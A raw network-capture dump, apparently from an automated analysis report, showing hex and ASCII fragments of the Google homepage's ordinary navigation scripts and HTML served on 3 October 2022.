                                                          2022-10-03 15:28:41 UTC23INData Raw: 64 3d 31 2f 72 73 3d 41 48 70 4f 6f 6f 39 33 32 4a 69 6e 6b 53 4a 48 4b 39 32 57 67 56 6a 49 56 2d 4a 77 77 79 75 33 52 77 2f 6d 3d 5f 5f 66 65 61 74 75 72 65 73 5f 5f 22 29 3b 47 2e 6d 73 3d 45 28 47 2e 6d 73 2c 22 68 74 74 70 73 3a 2f 2f 61 70 69 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 29 3b 47 2e 6d 3d 45 28 47 2e 6d 2c 22 22 29 3b 47 2e 6c 3d 45 28 47 2e 6c 2c 5b 5d 29 3b 47 2e 64 70 6f 3d 45 28 47 2e 64 70 6f 2c 22 22 29 3b 78 61 7c 7c 78 2e 70 75 73 68 28 5b 22 67 6c 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 61 62 63 2f 67 6c 6d 5f 65 37 62 62 33 39 61 37 65 31 61 32 34 35 38 31 66 66 34 66 38 64 31 39 39 36 37 38 62 31 62 39 2e 6a 73 22 7d 5d 29 3b 76 61 72 20 45 61 3d 7b 70 75 3a 79 61 2c 73 68
                                                          Data Ascii: d=1/rs=AHpOoo932JinkSJHK92WgVjIV-Jwwyu3Rw/m=__features__");G.ms=E(G.ms,"https://apis.google.com");G.m=E(G.m,"");G.l=E(G.l,[]);G.dpo=E(G.dpo,"");xa||x.push(["gl",{url:"//ssl.gstatic.com/gb/js/abc/glm_e7bb39a7e1a24581ff4f8d199678b1b9.js"}]);var Ea={pu:ya,sh
                                                          2022-10-03 15:28:41 UTC25INData Raw: 76 61 72 20 5f 45 3d 22 6c 65 66 74 22 2c 4b 61 3d 68 2e 61 28 22 22 29 2c 4c 61 3d 68 2e 61 28 22 22 29 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 48 28 61 2c 62 29 7c 7c 28 61 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 28 22 22 21 3d 63 3f 22 20 22 3a 22 22 29 2b 62 29 7d 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 3b 62 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 73 3f 5c 5c 62 22 2b 62 2b 22 5c 5c 62 22 29 3b 63 26 26 63 2e 6d 61 74 63 68 28 62 29 26 26 28 61 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 2e 72 65 70 6c 61 63 65 28 62 2c 22 22 29 29 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c
                                                          Data Ascii: var _E="left",Ka=h.a(""),La=h.a(""),I=function(a,b){var c=a.className;H(a,b)||(a.className+=(""!=c?" ":"")+b)},J=function(a,b){var c=a.className;b=new RegExp("\\s?\\b"+b+"\\b");c&&c.match(b)&&(a.className=c.replace(b,""))},H=function(a,b){b=new RegExp("\\
                                                          2022-10-03 15:28:41 UTC26INData Raw: 63 3d 30 3b 62 3d 50 61 5b 63 5d 3b 2b 2b 63 29 28 62 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 29 26 26 61 2e 70 75 73 68 28 62 29 3b 72 65 74 75 72 6e 20 61 7d 2c 57 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 56 61 28 29 3b 72 65 74 75 72 6e 20 30 3c 61 2e 6c 65 6e 67 74 68 3f 61 5b 30 5d 3a 6e 75 6c 6c 7d 2c 58 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 37 30 22 29 7d 2c 4b 3d 7b 7d 2c 4c 3d 7b 7d 2c 59 61 3d 7b 7d 2c 4d 3d 7b 7d 2c 4e 3d 76 6f 69 64 20 30 2c 63 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 72 79 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79
                                                          Data Ascii: c=0;b=Pa[c];++c)(b=document.getElementById(b))&&a.push(b);return a},Wa=function(){var a=Va();return 0<a.length?a[0]:null},Xa=function(){return document.getElementById("gb_70")},K={},L={},Ya={},M={},N=void 0,cb=function(a,b){try{var c=document.getElementBy
                                                          2022-10-03 15:28:41 UTC27INData Raw: 69 6c 64 4e 6f 64 65 73 28 29 29 7b 63 3d 5b 5b 22 67 62 6b 63 22 5d 2c 5b 22 67 62 66 22 2c 22 67 62 65 22 2c 22 67 62 6e 22 5d 2c 5b 22 67 62 6b 70 22 5d 2c 5b 22 67 62 6e 64 22 5d 5d 3b 64 3d 30 3b 76 61 72 20 6e 3d 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3b 66 3d 21 31 3b 66 6f 72 28 76 61 72 20 6d 3d 2d 31 2c 71 2c 53 3d 30 3b 71 3d 63 5b 53 5d 3b 53 2b 2b 29 7b 66 6f 72 28 76 61 72 20 46 3d 76 6f 69 64 20 30 2c 54 3d 30 3b 46 3d 71 5b 54 5d 3b 54 2b 2b 29 7b 66 6f 72 28 3b 64 3c 6e 26 26 48 28 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 5d 2c 46 29 3b 29 64 2b 2b 3b 69 66 28 46 3d 3d 62 29 7b 6b 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 5d 7c 7c 0a 6e 75 6c 6c 29 3b 66 3d 21 30 3b 62 72
                                                          Data Ascii: ildNodes()){c=[["gbkc"],["gbf","gbe","gbn"],["gbkp"],["gbnd"]];d=0;var n=k.childNodes.length;f=!1;for(var m=-1,q,S=0;q=c[S];S++){for(var F=void 0,T=0;F=q[T];T++){for(;d<n&&H(k.childNodes[d],F);)d++;if(F==b){k.insertBefore(l,k.childNodes[d]||null);f=!0;br
                                                          2022-10-03 15:28:41 UTC28INData Raw: 61 6c 75 65 3d 0a 21 31 3b 61 2e 63 61 6e 63 65 6c 42 75 62 62 6c 65 3d 21 30 7d 2c 71 62 3d 6e 75 6c 6c 2c 61 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4f 28 29 3b 69 66 28 61 29 7b 72 62 28 61 2c 22 4f 70 65 6e 69 6e 67 26 68 65 6c 6c 69 70 3b 22 29 3b 50 28 61 2c 21 30 29 3b 62 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 3f 62 3a 31 45 34 3b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 62 28 61 29 7d 3b 71 62 3d 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 63 2c 62 29 7d 7d 2c 74 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 4f 28 29 3b 61 26 26 28 50 28 61 2c 21 31 29 2c 72 62 28 61 2c 22 22 29 29 7d 2c 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 4f 28 29 3b 76 61 72 20 62 3d 61 7c 7c 64 6f 63 75
                                                          Data Ascii: alue=!1;a.cancelBubble=!0},qb=null,ab=function(a,b){O();if(a){rb(a,"Opening&hellip;");P(a,!0);b="undefined"!=typeof b?b:1E4;var c=function(){sb(a)};qb=window.setTimeout(c,b)}},tb=function(a){O();a&&(P(a,!1),rb(a,""))},sb=function(a){try{O();var b=a||docu
                                                          2022-10-03 15:28:41 UTC29INData Raw: 2c 4d 29 3b 70 28 22 61 63 68 22 2c 70 62 29 3b 70 28 22 65 68 22 2c 59 61 29 3b 70 28 22 61 65 68 22 2c 6f 62 29 3b 62 61 3d 68 2e 61 28 22 22 29 3f 54 61 3a 55 61 3b 70 28 22 71 73 22 2c 62 61 29 3b 70 28 22 73 65 74 43 6f 6e 74 69 6e 75 65 43 62 22 2c 52 61 29 3b 70 28 22 70 63 22 2c 53 61 29 3b 70 28 22 62 73 79 22 2c 76 62 29 3b 68 2e 64 3d 62 62 3b 68 2e 6a 3d 75 62 3b 76 61 72 20 78 62 3d 7b 7d 3b 77 2e 62 61 73 65 3d 78 62 3b 78 2e 70 75 73 68 28 5b 22 6d 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 73 65 6d 5f 38 64 32 38 37 36 38 34 63 38 37 39 31 34 36 35 63 62 34 62 65 61 62 39 36 65 63 63 33 36 64 36 2e 6a 73 22 7d 5d 29 3b 67 2e 73 67 3d 7b 63 3a 22 31 22 7d 3b 70 28 22 77 67 22 2c 7b 72 67
                                                          Data Ascii: ,M);p("ach",pb);p("eh",Ya);p("aeh",ob);ba=h.a("")?Ta:Ua;p("qs",ba);p("setContinueCb",Ra);p("pc",Sa);p("bsy",vb);h.d=bb;h.j=ub;var xb={};w.base=xb;x.push(["m",{url:"//ssl.gstatic.com/gb/js/sem_8d287684c8791465cb4beab96ecc36d6.js"}]);g.sg={c:"1"};p("wg",{rg
                                                          2022-10-03 15:28:41 UTC31INData Raw: 50 31 39 75 67 2d 41 4d 22 29 3b 76 61 72 20 6d 3d 67 2e 62 76 2e 66 2c 71 3d 64 28 22 31 22 29 3b 6e 3d 64 28 6e 29 3b 63 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 31 2f 63 29 3b 76 61 72 20 53 3d 64 28 22 34 37 36 30 35 34 33 33 33 2e 30 22 29 2c 46 3d 22 26 6f 67 67 76 3d 22 2b 64 28 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 38 30 31 2e 30 5f 70 30 22 29 2c 54 3d 64 28 22 63 6f 6d 22 29 2c 55 3d 64 28 22 65 6e 22 29 2c 56 3d 0a 64 28 22 47 42 52 22 29 3b 76 61 72 20 79 3d 30 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 31 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 32 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 34 29 3b 61 3d 5b 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 7a 78 3d 22 2c
                                                          Data Ascii: P19ug-AM");var m=g.bv.f,q=d("1");n=d(n);c=Math.round(1/c);var S=d("476054333.0"),F="&oggv="+d("es_plusone_gc_20220801.0_p0"),T=d("com"),U=d("en"),V=d("GBR");var y=0;h.a("")&&(y|=1);h.a("")&&(y|=2);h.a("")&&(y|=4);a=["//www.google.com/gen_204?atyp=i&zx=",
                                                          2022-10-03 15:28:41 UTC32INData Raw: 72 3d 73 32 34 22 7d 2c 0a 55 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 73 70 64 28 29 7d 29 7d 3b 70 28 22 73 70 6e 22 2c 50 62 29 3b 70 28 22 73 70 70 22 2c 52 62 29 3b 70 28 22 73 70 73 22 2c 51 62 29 3b 70 28 22 73 70 64 22 2c 55 62 29 3b 70 28 22 70 61 61 22 2c 4e 62 29 3b 70 28 22 70 72 6d 22 2c 4f 62 29 3b 6d 62 28 22 67 62 64 34 22 2c 4f 62 29 3b 0a 69 66 28 68 2e 61 28 22 22 29 29 7b 76 61 72 20 56 62 3d 7b 64 3a 68 2e 61 28 22 22 29 2c 65 3a 22 22 2c 73 61 6e 77 3a 68 2e 61 28 22 22 29 2c 70 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 6f 67 77 2f 64 65 66 61 75 6c 74 2d 75 73 65 72 3d 73 39 36 22 2c 63 70 3a 22 31 22 2c 78 70 3a 68 2e 61 28
                                                          Data Ascii: r=s24"},Ub=function(){C(function(){g.spd()})};p("spn",Pb);p("spp",Rb);p("sps",Qb);p("spd",Ub);p("paa",Nb);p("prm",Ob);mb("gbd4",Ob);if(h.a("")){var Vb={d:h.a(""),e:"",sanw:h.a(""),p:"https://lh3.googleusercontent.com/ogw/default-user=s96",cp:"1",xp:h.a(
                                                          2022-10-03 15:28:41 UTC33INData Raw: 7d 7d 3b 58 62 3d 21 31 3b 52 3d 7b 7d 3b 57 62 3d 7b 7d 3b 57 3d 6e 75 6c 6c 3b 58 3d 31 3b 0a 76 61 72 20 64 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 21 31 3b 74 72 79 7b 62 3d 61 2e 63 6f 6f 6b 69 65 26 26 61 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 22 50 52 45 46 22 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 21 62 7d 2c 65 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 61 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 66 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 61 2e 73 74 79 6c 65 26 26 61 2e 73 74 79 6c 65 2e
                                                          Data Ascii: }};Xb=!1;R={};Wb={};W=null;X=1;var dc=function(a){var b=!1;try{b=a.cookie&&a.cookie.match("PREF")}catch(c){}return!b},ec=function(){try{return!!e.localStorage&&"object"==typeof e.localStorage}catch(a){return!1}},fc=function(a){return a&&a.style&&a.style.
                                                          2022-10-03 15:28:41 UTC34INData Raw: 3b 76 61 72 20 5a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 5b 62 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 61 72 67 75 6d 65 6e 74 73 3b 67 2e 71 6d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 5b 62 5d 2e 61 70 70 6c 79 28 74 68 69 73 2c 64 29 7d 29 7d 7d 3b 5a 28 67 2e 75 70 2c 22 73 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 73 69 22 29 3b 5a 28 67 2e 75 70 2c 22 73 70 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 64 70 63 22 29 3b 5a 28 67 2e 75 70 2c 22 69 69 63 22 29 3b 67 2e 6d 63 66 28 22 75 70 22 2c 7b 73 70 3a 68 2e 62 28 22 30 2e 30 31 22 2c 31 29 2c 74 6c 64 3a 22 63 6f 2e 75 6b 22 2c 70 72 69 64 3a 22 31 22 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 63 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 66 6f 72 28 76 61 72 20 6d 3b 28 6d 3d 6b 5b
                                                          Data Ascii: ;var Z=function(a,b){a[b]=function(c){var d=arguments;g.qm(function(){a[b].apply(this,d)})}};Z(g.up,"sl");Z(g.up,"si");Z(g.up,"spl");Z(g.up,"dpc");Z(g.up,"iic");g.mcf("up",{sp:h.b("0.01",1),tld:"co.uk",prid:"1"});function lc(){function a(){for(var m;(m=k[
                                                          2022-10-03 15:28:41 UTC36INData Raw: 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 61 2e 6d 63 66 28 22 6d 6d 22 2c 7b 73 3a 22 31 22 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63
                                                          Data Ascii: he Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var a=window.gbar;a.mcf("mm",{s:"1"});}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-Lic
                                                          2022-10-03 15:28:41 UTC37INData Raw: 30 22 2c 65 69 3a 65 28 22 71 66 38 36 59 2d 58 33 46 5a 33 67 31 73 51 50 31 39 75 67 2d 41 4d 22 29 2c 65 6c 65 3a 64 28 22 31 22 29 2c 65 73 72 3a 65 28 22 30 2e 31 22 29 2c 65 76 74 73 3a 5b 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 22 74 6f 75 63 68 73 74 61 72 74 22 2c 22 74 6f 75 63 68 6d 6f 76 65 22 2c 22 77 68 65 65 6c 22 2c 22 6b 65 79 64 6f 77 6e 22 5d 2c 67 62 6c 3a 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 38 30 31 2e 30 5f 70 30 22 2c 68 64 3a 22 63 6f 6d 22 2c 68 6c 3a 22 65 6e 22 2c 69 72 70 3a 64 28 22 22 29 2c 70 69 64 3a 65 28 22 31 22 29 2c 0a 73 6e 69 64 3a 65 28 22 32 38 38 33 34 22 29 2c 74 6f 3a 65 28 22 33 30 30 30 30 30 22 29 2c 75 3a 65 28 22 22 29 2c 76 66 3a 22 2e 36 36 2e 22 7d 2c 67 3d 66 2c 68 3d 5b 22 62 6e 64
                                                          Data Ascii: 0",ei:e("qf86Y-X3FZ3g1sQP19ug-AM"),ele:d("1"),esr:e("0.1"),evts:["mousedown","touchstart","touchmove","wheel","keydown"],gbl:"es_plusone_gc_20220801.0_p0",hd:"com",hl:"en",irp:d(""),pid:e("1"),snid:e("28834"),to:e("300000"),u:e(""),vf:".66."},g=f,h=["bnd
                                                          2022-10-03 15:28:41 UTC38INData Raw: 62 74 3e 3c 61 20 63 6c 61 73 73 3d 22 67 62 7a 74 20 67 62 7a 30 6c 20 67 62 70 31 22 20 69 64 3d 67 62 5f 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 77 65 62 68 70 3f 74 61 62 3d 77 77 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 53 65 61 72 63 68 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 32 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6d 67 68 70 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 69 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73
                                                          Data Ascii: bt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.co.uk/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.co.uk/imghp?hl=en&tab=wi"><span class=gbtb2></s
                                                          2022-10-03 15:28:41 UTC39INData Raw: 22 20 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 74 72 75 65 20 61 72 69 61 2d 6f 77 6e 73 3d 67 62 64 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d 67 62 7a 74 6d 73 20 63 6c 61 73 73 3d 22 67 62 74 73 20 67 62 74 73 61 22 3e 3c 73 70 61 6e 20 69 64 3d 67 62 7a 74 6d 73 31 3e 4d 6f 72 65 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 6d 61 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 52 54 4d 69 41 57 6d 47 6d 39 4c 4a 45 6a 59 75 79 6d 4e 4a 39 41 27 3e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 67 62 7a 74 6d 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27
                                                          Data Ascii: " aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='RTMiAWmGm9LJEjYuymNJ9A'>document.getElementById('gbztm').addEventListener('click'
                                                          2022-10-03 15:28:41 UTC40INData Raw: 64 65 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 32 35 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 64 6f 63 75 6d 65 6e 74 2f 3f 75 73 70 3d 64 6f 63 73 5f 61 6c 63 22 3e 44 6f 63 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 6d 74 20 67 62 6d 68 22 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 3f 74 61 62 3d 77 68 22 20 63 6c 61 73
                                                          Data Ascii: deos</a></li><li class=gbmtc><a class=gbmt id=gb_25 href="https://docs.google.com/document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.co.uk/intl/en/about/products?tab=wh" clas
                                                          2022-10-03 15:28:41 UTC42INData Raw: 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 63 6c 69 63 6b 48 61 6e 64 6c 65 72 28 29 20 7b 20 67 62 61 72 2e 74 67 28 65 76 65 6e 74 2c 74 68 69 73 29 3b 20 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 20 69 64 3d 67 62 64 35 20 61 72 69 61 2d 6f 77 6e 65 72 3d 67 62 67 35 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 63 3e 3c 6f 6c 20 69 64 3d 67 62 6f 6d 20 63 6c 61 73 73 3d 67 62 6d 63 63 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 6b 63 20 67 62 6d 74 63 22 3e 3c 61 20 20 63 6c 61 73 73 3d 67 62 6d 74 20 68 72 65 66 3d 22 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 65 6e 22 3e 53 65 61 72 63 68 20 73 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                                                          Data Ascii: .addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd5 aria-owner=gbg5><div class=gbmc><ol id=gbom class=gbmcc><li class="gbkc gbmtc"><a class=gbmt href="/preferences?hl=en">Search settings</a></li><l
                                                          2022-10-03 15:28:41 UTC43INData Raw: 70 78 20 38 70 78 20 30 20 36 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 63 6f 6c 6f 72 3a 23 30 30 30 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 76 61 6c 75 65 3d 22 22 20 74 69 74 6c 65 3d 22 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 32 30 34 38 22 20 6e 61 6d 65 3d 22 71 22 20 73 69 7a 65 3d 22 35 37 22 3e 3c 2f 64 69 76 3e 3c 62 72 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 6c 73 62 22 20 76 61 6c 75 65 3d 22 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 62 74 6e 47 22 20 74 79 70 65
                                                          Data Ascii: px 8px 0 6px;vertical-align:top;color:#000" autocomplete="off" value="" title="Google Search" maxlength="2048" name="q" size="57"></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="Google Search" name="btnG" type
                                                          2022-10-03 15:28:41 UTC44INData Raw: 2b 2b 5d 3b 29 74 72 79 7b 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 64 29 2c 62 3d 22 32 22 7d 63 61 74 63 68 28 68 29 7b 7d 7d 61 3d 62 3b 69 66 28 22 32 22 3d 3d 61 26 26 2d 31 3d 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 22 26 67 62 76 3d 32 22 29 29 7b 76 61 72 20 66 3d 67 6f 6f 67 6c 65 2e 67 62 76 75 2c 67 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 76 22 29 3b 67 26 26 28 67 2e 76 61 6c 75 65 3d 61 29 3b 66 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 66 7d 2c 30 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 66 6f 72 6d 3e 3c 64 69 76 20
                                                          Data Ascii: ++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if("2"==a&&-1==location.search.indexOf("&gbv=2")){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div
                                                          2022-10-03 15:28:41 UTC45INData Raw: 7a 65 3a 31 30 70 74 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 31 39 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 22 20 69 64 3d 22 57 71 51 41 4e 62 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 61 64 73 2f 22 3e 41 64 76 65 72 74 69 73 69 6e 67 a0 50 72 6f 67 72 61 6d 6d 65 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 73 2f 22 3e 42 75 73 69 6e 65 73 73 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2e 68 74 6d 6c 22 3e 41 62 6f 75 74 20 47 6f 6f 67 6c 65 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 74 70 72 65 66 64 6f 6d 61 69 6e 3f 70
                                                          Data Ascii: ze:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">AdvertisingProgrammes</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a><a href="https://www.google.com/setprefdomain?p
